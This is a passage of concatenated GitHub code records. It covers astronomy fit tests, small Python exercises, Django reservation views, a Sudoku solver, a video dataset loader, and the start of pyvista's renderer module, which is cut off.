microlfits.MLFits(current_event)\n fit.model = model\n fit.fit_results = [0.0, 0.0, 0.0, 0.0, 1.0, 0.0]\n\n flag = fit.check_fit()\n\n assert flag == 'Good Fit'\n\n fit.fit_results = [0.0, 0.0, 0.0, 0.8, -1.0, 0.0]\n\n flag = fit.check_fit()\n\n assert flag == 'Bad Fit'\n\n\ndef test_LM_Jacobian():\n current_event = _create_event()\n model = microlmodels.create_model('FSPL',current_event)\n model.define_model_parameters()\n\n fit = microlfits.MLFits(current_event)\n fit.model = model\n\n to = 0.0\n uo = 0.1\n tE = 1.0\n rho = 0.26\n fs = 10\n g = 1.0\n\n parameters = [to, uo, tE, rho, fs, g]\n\n Jacobian = fit.LM_Jacobian(parameters)\n Jacobian = Jacobian.T\n assert Jacobian.shape == (6, len(current_event.telescopes[0].lightcurve_flux))\n\n\ndef test_chichi_telescopes():\n\n current_event = _create_event()\n model = microlmodels.create_model('FSPL',current_event)\n model.define_model_parameters()\n\n fit = microlfits.MLFits(current_event)\n fit.model = model\n\n to = 0.0\n uo = 0.1\n tE = 1.0\n rho = 0.26\n fs = 10\n g = 1.0\n\n parameters = [to, uo, tE, rho, fs, g]\n\n chichi_telescopes = fit.chichi_telescopes(parameters)\n chichi = sum(fit.residuals_LM(parameters)**2)\n\n assert len(chichi_telescopes) == 1\n assert np.allclose(chichi,chichi_telescopes[0])\n","repo_name":"caseylam/pyLIMA","sub_path":"pyLIMA/test/test_microlfits.py","file_name":"test_microlfits.py","file_ext":"py","file_size_in_byte":6620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"29556589473","text":"def main(n):\n if n <= 1:\n return n\n current = 0\n prev1 = 1\n prev2 = 0\n for i in range(2, n + 1):\n current = prev1 + prev2\n prev2 = prev1\n prev1 = current\n print(f\"Current: {current}. prev1: {prev1}. prev2: {prev2}.\")\n return current\n\n\nprint(f\"Recursion result: {main(n=10)}.\")\n\n\"\"\"\nOutput:\nCurrent: 1. prev1: 1. prev2: 1.\nCurrent: 2. prev1: 2. prev2: 1.\nCurrent: 3. prev1: 3. prev2: 2.\nCurrent: 5. prev1: 5. prev2: 3.\nCurrent: 8. prev1: 8. prev2: 5.\nCurrent: 13. prev1: 13. prev2: 8.\nCurrent: 21. prev1: 21. prev2: 13.\nCurrent: 34. prev1: 34. prev2: 21.\nCurrent: 55. prev1: 55. 
prev2: 34.\nRecursion result: 55.\n\nTime complexity: O(n)\nSpace complexity: O(1)\n\"\"\"\n","repo_name":"shafikshaon/python-data-structures-and-algorithms","sub_path":"leetcode/cards/recursion/fibonacci_number/iterartive_bottom_up.py","file_name":"iterartive_bottom_up.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"23848011349","text":"'''\nCreate Data Frame Using Dictionary in python.\nDictionary is a (key-value) Pair Data Type in python.\n'''\n\nimport pandas as pd\n\n# avoid shadowing the built-in name `dict`\ndata = { 'Name':['john', 'joe', 'Alex', 'Iris', 'berry'],\n        'degree':['B.Sc', 'M.Sc', 'M.A', 'B.A', 'C.A'] }\n\ndf = pd.DataFrame(data)\nprint(df)","repo_name":"codeperfectplus/Pythonite","sub_path":"Pandas/creating pandas dataframe from list using dictionary.py","file_name":"creating pandas dataframe from list using dictionary.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"}
{"seq_id":"25673891896","text":"from django.db import IntegrityError\nfrom django.http import Http404\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils import timezone\n\nfrom commons.views import handler_500_view\nfrom reservations.models import Term, Space, Reservation\nfrom users.models import PermissionTag\nfrom users.views import ManagerOnlyView, MemberOnlyView\n\n\nclass TermListView(ManagerOnlyView):\n    \"\"\"\n    View that lists the terms registered to the group\n    \"\"\"\n\n    def get(self, request, *args, **kwargs):\n        registered_terms = self.group.registered_terms.all()\n        self.context['registered_terms'] = registered_terms\n\n        return render(request, 'reservations/term_list.html', self.context)\n\n\nclass TermCreateView(ManagerOnlyView):\n    \"\"\"\n    View that creates a term\n    \"\"\"\n\n    def get(self, request, *args, **kwargs):\n        return render(request, 'reservations/term_create.html', self.context)\n\n    def post(self, request, *args, **kwargs):\n        title = request.POST['title']\n        body = request.POST['body']\n\n        new_term = Term.create_term(group=self.group, title=title, body=body)\n\n        return redirect('reservations:term_list', group_pk=self.group.pk)\n\n\nclass TermDeleteView(ManagerOnlyView, Term.FindingSingleInstance):\n    \"\"\"\n    View that deletes a term\n    \"\"\"\n\n    def get(self, request, *args, **kwargs):\n        self.init_term(request, *args, **kwargs)\n        self.term.delete()\n        return redirect('reservations:term_list', group_pk=self.group.pk)\n\n\nclass TermUpdateView(ManagerOnlyView, Term.FindingSingleInstance):\n    \"\"\"\n    View that updates a term\n    \"\"\"\n\n    def get(self, request, *args, **kwargs):\n        self.init_term(request, *args, **kwargs)\n        return render(request, 'reservations/term_update.html', self.context)\n\n    def post(self, request, *args, **kwargs):\n        self.init_term(request, *args, **kwargs)\n\n        new_title = request.POST['title']\n        new_body = request.POST['body']\n\n        self.term.update(title=new_title, body=new_body)\n\n        return redirect('reservations:term_list', group_pk=self.group.pk)\n\n\nclass SpaceListView(MemberOnlyView):\n    \"\"\"\n    View that shows the list of spaces registered to the group\n    \"\"\"\n\n    def get(self, request, *args, **kwargs):\n        return render(request, 'reservations/space_list.html', self.context)\n\n\nclass SpaceDetailView(MemberOnlyView, Space.FindingSingleInstance):\n    \"\"\"\n    View that shows the details and reservation info of a space registered to the group\n    \"\"\"\n\n    def get(self, request, *args, **kwargs):\n        self.init_space(request, *args, **kwargs)\n\n        year = request.GET.get('year')\n        month = 
request.GET.get('month')\n        day = request.GET.get('day')\n\n        target_day = Reservation.get_datetime(year, month, day)\n        if target_day is None:\n            raise Http404()\n\n        # Organize the reservation instances of the week containing target_day by date and by hour\n        reservation_of_week = Reservation.get_reservation_of_week(target_day, self.space)\n\n        # Below is needed for page rendering ==========================================\n        self.context['reservation_of_week'] = reservation_of_week\n        self.context['hour_24'] = list(range(24))\n        self.context['weekday_7'] = list(range(7))\n\n        time_index = [\n            ('AM' if i < 12 else 'PM') +\n            '{:0>2s}'.format(str(i if i <= 12 else i % 12)) + ':00' for i in range(24)\n        ]\n        self.context['time_index'] = time_index\n\n        monday = target_day - timezone.timedelta(days=target_day.weekday())\n        sunday = monday + timezone.timedelta(days=7)\n        self.context['monday'] = monday\n        self.context['sunday'] = sunday\n        self.context['monday_dt'] = monday.strftime('%Y/%m/%d')\n        self.context['sunday_dt'] = sunday.strftime('%Y/%m/%d')\n\n        prev_monday = monday - timezone.timedelta(days=7)\n        self.context[\n            'prev_monday_querystring'] = f\"year={prev_monday.year}&month={prev_monday.month}&day={prev_monday.day}\"\n        next_monday = monday + timezone.timedelta(days=7)\n        self.context[\n            'next_monday_querystring'] = f\"year={next_monday.year}&month={next_monday.month}&day={next_monday.day}\"\n\n        today = timezone.now()\n        self.context['today_querystring'] = f\"year={today.year}&month={today.month}&day={today.day}\"\n        # Above is needed for page rendering ==========================================\n\n        return render(request, 'reservations/space_detail.html', self.context)\n\n\nclass SpaceCreateView(ManagerOnlyView):\n    \"\"\"\n    View that creates a space\n    \"\"\"\n\n    def get(self, request, *args, **kwargs):\n        terms = self.group.registered_terms.all()\n        self.context['terms'] = terms\n\n        permission_tags = self.group.registered_permission_tags.all()\n        self.context['permission_tags'] = permission_tags\n\n        return render(request, 'reservations/space_create.html', self.context)\n\n    def post(self, request, *args, **kwargs):\n        term_pk = int(request.POST['term'])\n        permission_pk = int(request.POST['permission'])\n        name = request.POST['name']\n\n        if term_pk != -1:\n            term = get_object_or_404(Term, pk=term_pk)\n        else:\n            term = None\n\n        if permission_pk != -1:\n            permission_tag = get_object_or_404(PermissionTag, pk=permission_pk)\n        else:\n            permission_tag = None\n\n        new_space = Space.create_space(group=self.group, term=term, name=name,\n                                       required_permission=permission_tag)\n\n        return redirect('reservations:space_list', group_pk=self.group.pk)\n\n\nclass SpaceUpdateView(ManagerOnlyView, Space.FindingSingleInstance):\n    \"\"\"\n    View that updates the information of a space\n    \"\"\"\n\n    def get(self, request, *args, **kwargs):\n        self.init_space(request, *args, **kwargs)\n\n        terms = self.group.registered_terms.all()\n        self.context['terms'] = terms\n        self.context['current_term'] = self.space.term\n\n        permission_tags = self.group.registered_permission_tags.all()\n        self.context['permission_tags'] = permission_tags\n        self.context['current_permission_tag'] = self.space.required_permission\n\n        return render(request, 'reservations/space_update.html', self.context)\n\n    def post(self, request, *args, **kwargs):\n        self.init_space(request, *args, **kwargs)\n\n        term_pk = int(request.POST['term'])\n        permission_pk = int(request.POST['permission'])\n        new_name = request.POST['name']\n\n        if term_pk != -1:\n            new_term = get_object_or_404(Term, pk=term_pk)\n        else:\n            new_term = None\n\n        if permission_pk != -1:\n            new_permission_tag = 
get_object_or_404(PermissionTag, pk=permission_pk)\n        else:\n            new_permission_tag = None\n\n        self.space.update(name=new_name, term=new_term, required_permission=new_permission_tag)\n\n        return redirect('reservations:space_detail', group_pk=self.group.pk, space_pk=self.space.pk)\n\n\nclass SpaceDeleteView(ManagerOnlyView, Space.FindingSingleInstance):\n    \"\"\"\n    View that deletes a space\n    \"\"\"\n\n    def get(self, request, *args, **kwargs):\n        self.init_space(request, *args, **kwargs)\n        self.space.delete()\n        return redirect('reservations:space_list', group_pk=self.group.pk)\n\n\nclass CreateReservationView(MemberOnlyView, Space.FindingSingleInstance):\n    def get(self, request, *args, **kwargs):\n        self.init_space(request, *args, **kwargs)\n        self.context['blocked'] = False\n        self.context['permission_rejected'] = False\n\n        valid_blocks = request.user.get_valid_blocks_in_group(self.group)\n        # If the user currently has an active usage block\n        if valid_blocks:\n            self.context['blocked'] = True\n            self.context['valid_blocks'] = valid_blocks\n            return render(request, 'reservations/reservation_create.html', self.context)\n        # If the required permission is not satisfied\n        elif not Space.permission_checker.check(self.space, request.user):\n            self.context['permission_rejected'] = True\n            return render(request, 'reservations/reservation_create.html', self.context)\n\n        # Render the time table based on the Monday and on how many days the target weekday is away from that Monday\n        monday_year = request.GET.get('monday_year')\n        monday_month = request.GET.get('monday_month')\n        monday_day = request.GET.get('monday_day')\n        wd = int(request.GET.get('wd', 0))\n        hour = request.GET.get('hour')\n\n        target_monday = Reservation.get_datetime(monday_year, monday_month, monday_day)\n        if target_monday is None:\n            raise Http404()\n        target_day = target_monday + timezone.timedelta(days=wd)\n\n        try:\n            hour = int(hour)\n            if hour < 0:\n                raise Exception\n        except Exception:\n            return handler_500_view(request, *args, **kwargs)\n\n        target_dt = target_day.replace(hour=hour, minute=0, second=0, microsecond=0)\n        # If the slot is already booked\n        if Reservation.already_booked(space=self.space, target_dt=target_dt) or kwargs.get('already_booked'):\n            self.context['already_booked'] = True\n        else:\n            self.context['already_booked'] = False\n\n        self.context['reservation_year'] = target_dt.year\n        self.context['reservation_month'] = target_dt.month\n        self.context['reservation_day'] = target_dt.day\n        self.context['reservation_hour'] = hour\n        self.context['reservation_weekday'] = '월화수목금토일'[target_dt.weekday()]\n\n        return render(request, 'reservations/reservation_create.html', self.context)\n\n    def post(self, request, *args, **kwargs):\n        self.init_space(request, *args, **kwargs)\n\n        year = int(request.POST.get('year'))\n        month = int(request.POST.get('month'))\n        day = int(request.POST.get('day'))\n        hour = int(request.POST.get('hour'))\n\n        # If the slot is already booked\n        target_dt = timezone.datetime(year, month, day, hour)\n        try:\n            new_reservation = Reservation.create_reservation(space=self.space, member=request.user, target_dt=target_dt)\n        except IntegrityError:\n            kwargs['already_booked'] = True\n            return self.get(request, *args, **kwargs)\n        # Normal reservation\n        else:\n            return redirect('reservations:reservation_detail',\n                            group_pk=self.group.pk, space_pk=self.space.pk, reservation_pk=new_reservation.pk)\n\n\nclass ReservationDetailView(MemberOnlyView, Space.FindingSingleInstance, Reservation.FindingSingleInstance):\n    \"\"\"\n    View that shows the detailed information of a single reservation\n    \"\"\"\n\n    def get(self, request, *args, **kwargs):\n        self.init_space(request, *args, **kwargs)\n        self.init_reservation(request, *args, **kwargs)\n        return 
render(request, 'reservations/reservation_detail.html', self.context)\n\n\nclass ReservationDeleteView(MemberOnlyView, Space.FindingSingleInstance):\n    \"\"\"\n    View that deletes a reservation\n    \"\"\"\n\n    def get(self, request, *args, **kwargs):\n        self.init_space(request, *args, **kwargs)\n\n        reservation_pk = int(kwargs['reservation_pk'])\n        if request.user == self.group.manager:\n            reservation = get_object_or_404(Reservation, space=self.space, pk=reservation_pk)\n        else:\n            reservation = get_object_or_404(Reservation, space=self.space, pk=reservation_pk, member=request.user)\n        reservation.delete()\n\n        return redirect('reservations:space_detail', group_pk=self.group.pk, space_pk=self.space.pk)\n","repo_name":"pcjs156/space-reservation-system","sub_path":"reservations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"9261720450","text":"import tkinter as tk\r\n\r\n\r\nboard = [\r\n    [5, 3, 0, 0, 7, 0, 0, 0, 0],\r\n    [6, 0, 0, 1, 9, 5, 0, 0, 0],\r\n    [0, 9, 8, 0, 0, 0, 0, 6, 0],\r\n    [8, 0, 0, 0, 6, 0, 0, 0, 3],\r\n    [4, 0, 0, 8, 0, 3, 0, 0, 1],\r\n    [7, 0, 0, 0, 2, 0, 0, 0, 6],\r\n    [0, 6, 0, 0, 0, 0, 2, 8, 0],\r\n    [0, 0, 0, 4, 1, 9, 0, 0, 5],\r\n    [0, 0, 0, 0, 8, 0, 0, 7, 9]\r\n]\r\n\r\nwindow = tk.Tk()\r\nwindow.title(\"Sudoku Solver\")\r\n\r\ncell_size = 60\r\nboard_size = cell_size * 9\r\n\r\ncanvas = tk.Canvas(window, width=board_size, height=board_size)\r\ncanvas.pack()\r\n\r\ndef draw_board():\r\n    canvas.delete(\"all\")\r\n\r\n    for row in range(9):\r\n        for col in range(9):\r\n            cell_value = board[row][col]\r\n            cell_x = col * cell_size\r\n            cell_y = row * cell_size\r\n\r\n            canvas.create_rectangle(cell_x, cell_y, cell_x + cell_size, cell_y + cell_size, outline=\"black\")\r\n\r\n            if cell_value != 0:\r\n                canvas.create_text(cell_x + cell_size // 2, cell_y + cell_size // 2, text=str(cell_value),\r\n                                   font=(\"Arial\", 20))\r\n\r\n    for i in range(10):\r\n        line_color = \"black\" if i % 3 == 0 else \"red\"\r\n\r\n        canvas.create_line(0, i * cell_size, board_size, i * cell_size, fill=line_color)\r\n        canvas.create_line(i * cell_size, 0, i * cell_size, board_size, fill=line_color)\r\n\r\ndef is_valid(row, col, num):\r\n    \r\n    for i in range(9):\r\n        if board[row][i] == num:\r\n            return False\r\n\r\n    \r\n    for i in range(9):\r\n        if board[i][col] == num:\r\n            return False\r\n\r\n    \r\n    start_row = (row // 3) * 3\r\n    start_col = (col // 3) * 3\r\n    for i in range(3):\r\n        for j in range(3):\r\n            if board[start_row + i][start_col + j] == num:\r\n                return False\r\n\r\n    return True\r\n\r\ndef solve_sudoku():\r\n    for row in range(9):\r\n        for col in range(9):\r\n            if board[row][col] == 0:\r\n                for num in range(1, 10):\r\n                    if is_valid(row, col, num):\r\n                        board[row][col] = num\r\n                        draw_board()\r\n                        window.update()\r\n\r\n                        if solve_sudoku():\r\n                            return True\r\n\r\n                        board[row][col] = 0\r\n                        draw_board()\r\n                        window.update()\r\n\r\n                return False\r\n\r\n    return True\r\n\r\ndef solve_button_click():\r\n    solve_sudoku()\r\n\r\ndraw_board()\r\n\r\n\r\nsolve_button = tk.Button(window, text=\"Solve\", command=solve_button_click)\r\nsolve_button.pack()\r\n\r\n\r\nwindow.mainloop()\r\n","repo_name":"karthik-2612/Python-Program","sub_path":"SudokuSolver.py","file_name":"SudokuSolver.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"6858081574","text":"#*************************** saving the file as txt ************\n\ndef 
salvar_aviao(aeroporto):\n    arq = open('aviao.txt','w')\n    for pessoa in aeroporto:\n        arq.write(f'{pessoa}\\n')\n    arq.close()\n#*************************** reading and saving into a list************\ndef ler():\n    aeroporto1=[]\n    arq = open('aviao.txt','r')\n    for linha in arq:\n        linha = linha.strip()\n        aeroporto1.append(linha) \n    arq.close()    \n    return aeroporto1  \n\n#*************************** list of the people who are at the airport ************\naeroporto = ['piloto','oficial_A','oficial_B','chefe','comissaria_A',\n             'comissaria_B','policial','presidiario']\naviao = []\n\n#*************************** function that sends people from the airport to the plane ************\ndef viagem ():  \n\n    if len(aeroporto) <= 2:  \n        print(f'Viagem ao avião: {aeroporto[0]} e {aeroporto[1]}')  \n        aviao.append(aeroporto.pop(0))\n        aviao.append(aeroporto.pop(0))\n        \n        \n    else:\n        if aeroporto[1]=='piloto'or aeroporto[1]=='chefe' or aeroporto[1]=='policial':\n            aeroporto[0],aeroporto[1]=aeroporto[1],aeroporto[0]\n            print(f'Estão no aeroporto: {aeroporto}')\n            print(f'Viagem ao avião: {aeroporto[0]} e {aeroporto[1]}')\n            aviao.append(aeroporto.pop(1))\n            \n        else:\n            print(f'Estão no aeroporto: {aeroporto}')\n            print(f'Viagem ao avião: {aeroporto[0]} e {aeroporto[1]}')\n            aviao.append(aeroporto.pop(1))\n    \n    if aeroporto:\n        print(f'Voltando para aeroporto: {aeroporto[0]}')\n        print(f'Dentro do avião {aviao}')\n        print('\\n') \n    else:\n        print(f'Todos no avião {aviao}')  \n\nfor i in range(0,7):\n    (viagem())\nprint('\\n')\nsalvar_aviao(aviao)\n\na=ler()\n#*************************** printing the txt ************\nprint(a)","repo_name":"ohanamirella/TrabalhosPython","sub_path":"Aula 30/exercicio1.py","file_name":"exercicio1.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
{"seq_id":"40923827386","text":"__author__ = 'qianyu'\n\nimport torch\nimport torch.utils.data as data\nfrom utils import get_dataset_info\n\n\nclass UCF101(data.Dataset):\n    \"\"\"\n    Args:\n        spatial_transform (callable, optional): A function/transform that takes in a PIL image\n            and returns a transformed version. 
E.g, ``transforms.RandomCrop``\n temporal_transform (callable, optional): A function/transform that takes in a list of frame indices\n and returns a transformed version\n target_transform (callable, optional): A function/transform that takes in the\n target and transforms it.\n loader (callable, optional): A function to load an video given its path and frame indices.\n \"\"\"\n\n def __init__(self,\n video_path,\n annotation_path,\n subset,\n n_samples_per_video=1,\n sample_duration=16,\n spatial_transform=None,\n temporal_transform=None,\n target_transform=None):\n self.data, self.class_names = get_dataset_info(\n video_path, annotation_path, subset,\n n_samples_per_video, sample_duration)\n\n self.spatial_transform = spatial_transform\n self.temporal_transform = temporal_transform\n self.target_transform = target_transform\n self.loader = get_loader()\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: (image, target) where target is class_index of the target class.\n \"\"\"\n path = self.data[index]['video']\n\n frame_indices = self.data[index]['frame_indices']\n if self.temporal_transform is not None:\n frame_indices = self.temporal_transform(frame_indices)\n clip = self.loader(path, frame_indices)\n if self.spatial_transform is not None:\n self.spatial_transform.randomize_parameters()\n clip = [self.spatial_transform(img) for img in clip]\n clip = torch.stack(clip, 0).permute(1, 0, 2, 3)\n\n target = self.data[index]\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return clip, target\n\n def __len__(self):\n return len(self.data)","repo_name":"AmmieQi/video-feature-extraction","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"71828936246","text":"class Node:\n def __init__(self, name) -> None:\n self.children = []\n self.name = name\n\n def add_child(self, name):\n self.children.append(Node(name))\n return self\n \n def breadth_first_search(self, array):\n queue = [self]\n while len(queue) > 0:\n current_node = queue.pop(0)\n array.append(current_node.name)\n for node in current_node.children:\n queue.append(node)\n return array\n\nmyTree = Node(1).add_child(2).add_child(3).add_child(4)\nprint(myTree.breadth_first_search([]))","repo_name":"kaiquecaires/algorithms","sub_path":"medium/breadth_first_search/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42210346778","text":"names = [\"Judith\", \"Abel\", \"Tyson\", \"Martha\", \"Beverley\", \"David\", \"Anabel\"]\nestimated_insurance_costs = [1000.0, 2000.0, 3000.0, 4000.0, 5000.0, 6000.0, 7000.0]\nactual_insurance_costs = [1100.0, 2200.0, 3300.0, 4400.0, 5500.0, 6600.0, 7700.0]\n\n#initialize a new variable\ntotal_cost = 0\n\n#itireating trough the first list and add value to total_cost\nfor cost in actual_insurance_costs:\n total_cost += cost\n\n#calculate and print the avg cost\naverage_cost = total_cost / len(actual_insurance_costs)\nprint(\"The average insurance cost: \", average_cost, \" dollars.\")\n\n#iterate trough the list names and print information on the situation and one based on the condition\nfor i in range(0, len(names)):\n name = names[i]\n insurance_cost = actual_insurance_costs[i]\n print(\"The insurance cost for \" + name + \" is \" + 
str(insurance_cost) + \" dollars\")\n    if insurance_cost > average_cost:\n        print(\"The insurance cost for \" + name + \" is above average.\")\n    elif insurance_cost < average_cost:\n        print(\"The insurance cost for \" + name + \" is below average.\")\n    else:\n        print(\"The insurance cost for \" + name + \" is equal to the average.\")\n\n#updated and print estimate costs\nupdated_estimated_costs = [update * 11/10 for update in estimated_insurance_costs]\nprint(updated_estimated_costs)\n\n#extra challenge\n\n#transform the first for loop into a while (reset the total and walk the list by index)\ni = 0\ntotal_cost = 0\nwhile i < len(actual_insurance_costs):\n    total_cost += actual_insurance_costs[i]\n    i += 1\n\nprint(total_cost)\n\n#calculate how far the user is above or below the average\nfor i in range(0, len(names)):\n    name = names[i]\n    insurance_cost = actual_insurance_costs[i]\n    #difference_cost = insurance_cost - average_cost\n    if insurance_cost > average_cost:\n        print(\"The extra cost for \" + name +\n              \" between the actual and average insurance cost is: \"\n              + str(insurance_cost - average_cost) + \" €\")\n    elif insurance_cost < average_cost:\n        print(\"The benefit for \" + name +\n              \" between the actual and average insurance cost is: \"\n              + str(average_cost - insurance_cost) + \" €\")\n    else:\n        print(\"You pay the right price. There is no difference!\")\n","repo_name":"aadelboo/medical_insurance_project","sub_path":"medical_insurance_loops.py","file_name":"medical_insurance_loops.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"3992887391","text":"# from project.user import User\nfrom user import User\n\nclass Library:\n    def __init__(self):\n        self.user_records = []\n        self.books_available = {}\n        # ^ {\"authors\"(key: str): books(list: str)}\n        self.rented_books = {}\n        # ^ {\"username\": {\"book_name\"(key:str): days_to_return(int)}}\n\n    def get_book(self, author: str, book_name: str, days_to_return: int, user: User):\n        # rented_books is keyed by username, so scan every member's rentals\n        for rented in self.rented_books.values():\n            if book_name in rented:\n                return f\"The book {book_name} is already rented and will be available in \" \\\n                       f\"{rented[book_name]} days!\"\n        user.books.append(book_name)\n        self.books_available[author].remove(book_name)\n        # keep any other books the user already rents\n        self.rented_books.setdefault(user.username, {})[book_name] = days_to_return\n\n    def return_book(self, author: str, book_name: str, user: User):\n        if book_name in user.books:\n            user.books.remove(book_name)\n            # the per-user record is a dict, so delete the key (dicts have no .remove())\n            del self.rented_books[user.username][book_name]\n            self.books_available[author].append(book_name)\n        else:\n            return f\"{user.username} doesn't have this book in his/her records!\"\n\n\n","repo_name":"ilmagnifico33749/SoftUni_Student_KP","sub_path":"03. Python_OOP_Feb2023/02. Classes and Objects/02. EX/08. Library_v1 - To Finalize/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"70100577847","text":"\"\"\"Module containing pyvista implementation of vtkRenderer.\"\"\"\n\nimport collections.abc\nfrom functools import partial, wraps\nfrom typing import Sequence, cast\nimport warnings\n\nimport numpy as np\n\nimport pyvista\nfrom pyvista import MAX_N_COLOR_BARS, vtk_version_info\nfrom pyvista.core._typing_core import BoundsLike\nfrom pyvista.core.errors import PyVistaDeprecationWarning\nfrom pyvista.core.utilities.helpers import wrap\nfrom pyvista.core.utilities.misc import assert_empty_kwargs, try_callback\n\nfrom . 
import _vtk\nfrom .actor import Actor\nfrom .camera import Camera\nfrom .charts import Charts\nfrom .colors import Color, get_cycler\nfrom .errors import InvalidCameraError\nfrom .helpers import view_vectors\nfrom .render_passes import RenderPasses\nfrom .tools import create_axes_marker, create_axes_orientation_box, parse_font_family\nfrom .utilities.gl_checks import check_depth_peeling, uses_egl\n\nACTOR_LOC_MAP = [\n    'upper right',\n    'upper left',\n    'lower left',\n    'lower right',\n    'center left',\n    'center right',\n    'lower center',\n    'upper center',\n    'center',\n]\n\n\ndef map_loc_to_pos(loc, size, border=0.05):\n    \"\"\"Map location and size to a VTK position and position2.\n\n    Parameters\n    ----------\n    loc : str\n        Location of the actor. Can be a string with values such as 'right',\n        'left', 'upper', or 'lower'.\n    size : Sequence of length 2\n        Size of the actor. It must be a list of length 2.\n    border : float, default: 0.05\n        Size of the border around the actor.\n\n    Returns\n    -------\n    tuple\n        The VTK position and position2 coordinates. Tuple of the form (x, y, size).\n\n    Raises\n    ------\n    ValueError\n        If the ``size`` parameter is not a list of length 2.\n\n    \"\"\"\n    if not isinstance(size, Sequence) or len(size) != 2:\n        raise ValueError(f'`size` must be a list of length 2. Passed value is {size}')\n\n    if 'right' in loc:\n        x = 1 - size[1] - border\n    elif 'left' in loc:\n        x = border\n    else:\n        x = 0.5 - size[1] / 2\n\n    if 'upper' in loc:\n        y = 1 - size[1] - border\n    elif 'lower' in loc:\n        y = border\n    else:\n        y = 0.5 - size[1] / 2\n\n    return x, y, size\n\n\ndef make_legend_face(face):\n    \"\"\"\n    Create the legend face based on the given face.\n\n    Parameters\n    ----------\n    face : str | None | pyvista.PolyData\n        The shape of the legend face. Valid strings are:\n        '-', 'line', '^', 'triangle', 'o', 'circle', 'r', 'rectangle'.\n        Also accepts ``None`` and instances of ``pyvista.PolyData``.\n\n    Returns\n    -------\n    pyvista.PolyData\n        The legend face as a PolyData object.\n\n    Raises\n    ------\n    ValueError\n        If the provided face value is invalid.\n    \"\"\"\n    if face is None:\n        legendface = pyvista.PolyData([0.0, 0.0, 0.0])\n    elif face in [\"-\", \"line\"]:\n        legendface = _line_for_legend()\n    elif face in [\"^\", \"triangle\"]:\n        legendface = pyvista.Triangle()\n    elif face in [\"o\", \"circle\"]:\n        legendface = pyvista.Circle()\n    elif face in [\"r\", \"rectangle\"]:\n        legendface = pyvista.Rectangle()\n    elif isinstance(face, pyvista.PolyData):\n        legendface = face\n    else:\n        raise ValueError(\n            f'Invalid face \"{face}\". Must be one of the following:\\n'\n            '\\t\"triangle\"\\n'\n            '\\t\"circle\"\\n'\n            '\\t\"rectangle\"\\n'\n            '\\tNone'\n            '\\tpyvista.PolyData'\n        )\n    return legendface\n\n\ndef scale_point(camera, point, invert=False):\n    \"\"\"Scale a point using the camera's transform matrix.\n\n    Parameters\n    ----------\n    camera : Camera\n        The camera whose matrix to use.\n\n    point : sequence[float]\n        Scale point coordinates.\n\n    invert : bool, default: False\n        If ``True``, invert the matrix to transform the point out of\n        the camera's transformed space. 
Default is ``False`` to\n transform a point from world coordinates to the camera's\n transformed space.\n\n Returns\n -------\n tuple\n Scaling of the camera in ``(x, y, z)``.\n\n \"\"\"\n if invert:\n mtx = _vtk.vtkMatrix4x4()\n mtx.DeepCopy(camera.GetModelTransformMatrix())\n mtx.Invert()\n else:\n mtx = camera.GetModelTransformMatrix()\n scaled = mtx.MultiplyDoublePoint((point[0], point[1], point[2], 0.0))\n return (scaled[0], scaled[1], scaled[2])\n\n\nclass CameraPosition:\n \"\"\"Container to hold camera location attributes.\n\n Parameters\n ----------\n position : sequence[float]\n Position of the camera.\n\n focal_point : sequence[float]\n The focal point of the camera.\n\n viewup : sequence[float]\n View up of the camera.\n\n \"\"\"\n\n def __init__(self, position, focal_point, viewup):\n \"\"\"Initialize a new camera position descriptor.\"\"\"\n self._position = position\n self._focal_point = focal_point\n self._viewup = viewup\n\n def to_list(self):\n \"\"\"Convert to a list of the position, focal point, and viewup.\n\n Returns\n -------\n list\n List of the position, focal point, and view up of the camera.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.camera_position.to_list()\n [(0.0, 0.0, 1.0), (0.0, 0.0, 0.0), (0.0, 1.0, 0.0)]\n\n \"\"\"\n return [self._position, self._focal_point, self._viewup]\n\n def __repr__(self):\n \"\"\"List representation method.\"\"\"\n return \"[{},\\n {},\\n {}]\".format(*self.to_list())\n\n def __getitem__(self, index):\n \"\"\"Fetch a component by index location like a list.\"\"\"\n return self.to_list()[index]\n\n def __eq__(self, other):\n \"\"\"Comparison operator to act on list version of CameraPosition object.\"\"\"\n if isinstance(other, CameraPosition):\n return self.to_list() == other.to_list()\n return self.to_list() == other\n\n @property\n def position(self): # numpydoc ignore=RT01\n \"\"\"Location of the camera in world coordinates.\"\"\"\n return self._position\n\n @position.setter\n def position(self, value): # numpydoc ignore=GL08\n self._position = value\n\n @property\n def focal_point(self): # numpydoc ignore=RT01\n \"\"\"Location of the camera's focus in world coordinates.\"\"\"\n return self._focal_point\n\n @focal_point.setter\n def focal_point(self, value): # numpydoc ignore=GL08\n self._focal_point = value\n\n @property\n def viewup(self): # numpydoc ignore=RT01\n \"\"\"Viewup vector of the camera.\"\"\"\n return 